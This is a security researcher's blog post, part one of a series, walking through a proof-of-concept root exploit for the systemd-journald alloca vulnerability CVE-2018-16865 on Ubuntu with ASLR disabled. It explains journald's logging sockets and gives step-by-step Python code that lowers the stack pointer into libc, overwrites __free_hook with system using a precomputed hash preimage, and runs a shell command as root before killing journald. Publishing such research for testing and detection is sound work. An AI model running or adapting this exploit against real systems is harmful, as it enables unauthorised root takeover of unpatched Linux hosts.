Exploiting systemd-journald Part 1

Introduction

This is part one in a multipart series (read Part 2 here) on exploiting two vulnerabilities in systemd-journald, which were published by Qualys on January 9th. Specifically, the vulnerabilities were:

  • a user-influenced size passed to alloca(), allowing manipulation of the stack pointer (CVE-2018-16865)
  • a heap-based memory out-of-bounds read, yielding memory disclosure (CVE-2018-16866)

The affected program, systemd-journald, is a system service that collects and stores logging data. The vulnerabilities discovered in this service allow for user-generated log data to manipulate memory such that they can take over systemd-journald, which runs as root. Exploitation of these vulnerabilities thus allow for privilege escalation to root on the target system.

As Qualys did not provide exploit code, we developed a proof-of-concept exploit for our own testing and verification. There are some interesting aspects that were not covered by Qualys’ initial publication, such as how to communicate with the affected service to reach the vulnerable component, and how to control the computed hash value that is actually used to corrupt memory. We thought it was worth sharing the technical details for the community.

As the first in our series on this topic, the objective of this post is to provide the reader with the ability to write a proof-of-concept capable of exploiting the service with Address Space Layout Randomization (ASLR) disabled. In the interest of not posting an unreadably-long blog, and also not handing sharp objects to script-kiddies before the community has had chance to patch, we are saving some elements for discussion in future posts in this series, including details on how to control the key computed hash value. We are also considering providing a full ASLR bypass, but are weighing whether we are lowering the bar too much for the kiddies (feel free to weigh in with opinions).

As the focus of this post is on exploitation, the content is presented assuming the reader is already familiar with the initial publication’s analysis of the basic nature and mechanisms of the vulnerabilities involved. The target platform and architecture which we assume for this post is Ubuntu x86_64, and so to play along at home, we recommend using the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image.

Proof-of-Concept

Attack Vector

Before we can start exploiting a service, we need to understand how to communicate with it. In the case of journald, we could use the project’s own C library (excellently explained here). To ease exploitation, we need to have full control over the data sent to the target, a capability which unfortunately the journald libraries don’t provide out of the box. Thus, we chose to write our exploit in Python, implementing all the required functionality from scratch.

To dive deeper into how our exploit works, we need to first understand how journald clients communicate to the daemon. So let’s get started!

Interacting with systemd-journald

There are three main ways userland applications can interact with journald: the syslog interface, the journald-native interface, and journald’s service stdout/stdin redirection. All of these interfaces have dedicated UNIX sockets in /run/systemd/journald/. For our purposes, we only need to investigate the syslog and native interfaces, as those attempt to parse the log messages sent by programs, and are where the vulnerabilities reside.

Syslog Interface

The syslog interface is the simplest interface to journald, being a compatibility layer for applications that aren’t built with journald-specific logging. This interface is available by writing to one of the standard syslog UNIX datagram sockets such as /dev/log or /run/systemd/journal/dev-log. Any syslog messages written into them are parsed by journald (to remove the standard date, hostname, etc. added by syslog, see manpage syslog(3)) and then saved.

A simple way to experiment with the parser is by sending data with netcat, and observing the output with journalctl:

$ echo 'Test Message!' | nc -Uu /dev/log
$ journalctl --user -n 1
...
Jan 23 17:23:47 localhost nc[3646]: Test Message!

Journald-Native Interface

The native interface is how journal-aware applications log to the journal. Similar to the syslog interface, this is accessed by the UNIX datagram socket at /run/systemd/journal/socket.The journald-native interface uses a simple protocol for clients to talk to the journald server over this socket, resembling a simple Key/Value store, and which allows clients to send multiple newline-separated entries in a single write. These entries can either be simple KEY=VALUE pairs or binary blobs. Binary blobs are formed by sending the entry field name, a newline, the size of the blob as a uint64, the contents of the blob, and a final newline like so:

SOME_KEY
\x0a\x00\x00\x00\x00\x00\x00\x00\x00SOME_VALUE

The native socket can also accept these entries in two different ways:

  • by directly sending data over the socket
  • by using an interesting feature of UNIX sockets, which is the ability to send a file descriptor (FD) over the socket

Datagram sockets can only handle messages of a limited size (around 0x34000 bytes in our environment) before erroring with EMSGSIZE, and this is where FD passing comes in to play. We can write our messages to a temporary file, then pass journald a file descriptor for that file, giving us the ability to send messages up to journald’s self-imposed 768MB limit (defined by DATA_SIZE_MAX).

Digging into FD passing a bit further, we find that journald can accept two different types of file descriptors:

  • normal file descriptors (see manpages fcntl(2))
  • sealed memfds (see manpages memfd_create(2))

Luckily, we don’t need to bother with sealed file descriptors for reasons that we’ll get to in a future post.

Similarly to the syscall interface, you can easily send native messages with nc:

$ echo 'MESSAGE=Hello!' | nc -Uu /run/systemd/journal/socket
$ journalctl --user -n 1
...
Jan 23 17:39:40 localhost nc[7154]: Hello!

And to add custom entries:

$ echo 'KEY=VALUE\nMESSAGE=Hello!' | nc -Uu /run/systemd/journal/socket
$ journalctl --user -n 1 -o json-pretty
{
        "__CURSOR" : "s=e07cdf6930884834bec282476c7b59e0;i=4e652;b=9a1272556aa440f69531842f94d8f10a;m=163757c8c8
        "__REALTIME_TIMESTAMP" : "1548283220714394",
        "__MONOTONIC_TIMESTAMP" : "95417780424",
...
        "MESSAGE" : "Hello!",
        "KEY" : "VALUE",
...
}

Exploitation

Overview

Now that we have a decent understanding of how to interact with journald, we can start writing our exploit. Since the goal of this first post is to write a PoC which works with ASLR disabled, we don’t have to worry about using the syslog interface to perform a memory disclosure, and will instead jump directly into the fun of exploiting journald with CVE-2018-16865.

As noted by Qualys, the user-influenced size allocated with alloca() is exploitable due to the ability to create a message with thousands, or even millions of entries. When these entries are appended to the journal, these messages result in a size of roughly sizeof(EntryItem) * n_entries to be allocated via alloca(). Since the mechanism of alloca() to reserve memory on the stack is a simple subtraction from the stack pointer with a sub rsp instruction, our influence over this size value grants the ability to lower the stack pointer off the bottom of the stack into libc. The actual use of alloca() in the source is wrapped in a macro called newa(), and the responsible code for the vulnerable operation looks like:

items = newa(EntryItem, MAX(1u, n_iovec));

Our general approach for exploiting this vulnerability is to initially send the right size and count of entries, so as to make the stack pointer point to libc’s BSS memory region , and then surgically overwrite the free_hook function pointer with a pointer to system. This grants us arbitrary command execution upon the freeing of memory with content we control.

To actually exploit this, there are two main issues we need to solve:

  • Sending all of the entries to journald
  • Controlling the data written to the stack after it has been lowered into libc

The first issue has already been addressed by our exploration of the native interface, as discussed in the previous section. From this interface we can write data to a temporary file, and then pass the FD for that file to journald which gives us easily enough room to send the hundreds of megabytes of data needed to jump from the stack to libc.

The second issue is a bit more complex, since we don’t directly control the data written to the stack after it has been lowered into libc’s memory. This is because our entries are being hashed prior to being written, by the function jenkins_hashlittle2 (originally written by Bob Jenkins, hence the name).

Thus, exploitation requires controlling all 64 bits of output that the hash function produces, which presents a seemingly formidable problem at first. Preimaging a hash can be a daunting task; however, there are some very nice tools we can use to calculate exact preimages in under 30 seconds, since this is not a cryptographically secure hash. We’ll be exploring the specifics of achieving this calculation and the tools involved in our next blog post. For the scope of this post and our initial PoC, we will be using the constants we have already computed for our Vagrant image.

Proof-of-Concept Code

Here we will begin walking through Python code for our PoC, and a link to the full script can be found at the very end.

The first chunk of code is basic setup, helper functions, and a nice wrapper around UNIX sockets that will make our life easier further down the line:

#!/usr/bin/env python3
import array
import os
import socket
import struct

TEMPFILE = '/tmp/systemdown_temp'

def p64(n):
    return struct.pack('<Q', n)

class UNIXSocket(object):
    def __init__(self, path):
        self.path = path

    def __enter__(self):
        self.client = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM, 0)
        self.client.connect(self.path)
        return self.client

    def __exit__(self, exc_t, exc_v, traceback):
        self.client.close()

Next we have some constants that may change based on the particular target environment. These constants were built for the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image (and again, these assume a target with ASLR disabled):

# Non-ASLR fixed locations for our test image

libc = 0x7ffff79e4000
stack = 0x7fffffffde60

#location of the free_hook function pointer to overwrite
free_hook = libc + 0x3ed8e8

# preimage which computes to location of the system function via hash64()
# that location is libc + 0x4f440 in our test image
system_preimage = b"Y=J~-Y',Wj(A" 

# padding count to align memory
padding_kvs = 3

Now we have the bulk of the values needed for our proof-of-concept exploit.

The first step in the exploit logic is to add some padding entries which causes an increase in the size of the alloca, shifting the stacks of journal_file_append_data
(and the functions it calls) further down. This is to align the precise location where data will be written in libc’s .BSS, and avoid unnecessarily clobbering any other libc global values, which could greatly interfere with exploitation.

with open(TEMPFILE, 'wb') as log:
    msg = b""
    for _ in range(padding_kvs):
        msg += b"P=\n"

Next, we add the preimage value, the hash for which (when computed from hash64()) will be the address of system. Specifically, this alignment of this value will be such that journald writes system into libc’s __free_hook, giving us a shell when our command below is freed.

   # msg n is our key that when hashed gives system
    msg += system_preimage + b"\n"

Next, we append our command as a binary data block surrounded by semicolons to make sh happy. We also ensure journald is forcefully killed here so that libc has no chance of locking up after the system() call returns:

# next is our command as a binary data block
    cmd = b"echo $(whoami) > /tmp/pwn"
    # be sure to kill journald afterwards so it doesn't lockup
    cmd = b";" + cmd + b";killall -9 /lib/systemd/systemd-journald;"
    # format as a binary data block
    msg += b"C\n"
    msg += p64(len(cmd))
    msg += cmd + b"\n"

As described by Qualys, we then send a large entry (>=128MB), which results in an error and causes journald to break out of the loop that is processing the entries (src). Once this error condition is hit and the loop is stopped, no more values are written, and so this step is important to discontinue the corrupting of memory, preventing values from being written to unmapped / non-writable memory between libc and the stack.

 # Then we send a large item which breaks the loop
    msg += b"A=" + b"B"*(128*1024*1024) + b"\n"

Finally, we pad our message with enough entries to cause the stack->libc drop to happen in the first place:

 # Then fill with as many KVs as we need to get to the right addr
    num_msgs = (((stack - free_hook)//16) - 1)
    num_msgs -= 3  # the three above
    num_msgs -= 7  # added by journald itself

    msg += b"B=\n" * num_msgs

    log.write(msg)

At this point, we just need to pass the log FD to journald to get our shell:

with UNIXSocket("/run/systemd/journal/socket") as sock:
    with open(TEMPFILE, 'rb') as log:
        sock.sendmsg([b""], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [log.fileno()]))])

os.unlink(TEMPFILE)

After running this, we find the file /tmp/pwn has been created with contents “root”, meaning we have successfully achieved our privilege escalation.

$ cat /tmp/pwn
root

All Together Now

The full proof-of-concept script that works with ASLR disabled is available here.

Detection

Having a working exploit for this (and other interesting) CVEs helps us validate our zero-day detection capabilities, and when necessary, improve them. Here, even with ASLR turned off, we detect exploitation out-of-the-box, as it is happening, through our Stack Pivot Strategy (we call our detection models strategies), and would generally detect most payloads.  With ASLR turned on, an additional strategy detects the attempt to bypass ASLR. We do this all by looking for clear evidence of exploitation, instead of attempting to do signature scanning for IOCs associated with any specific CVE, malware family, threat actor, etc. While we can support that too, whack-a-mole isn’t a good model for detection and prevention.

Read Part 2 of Exploiting systemd-journald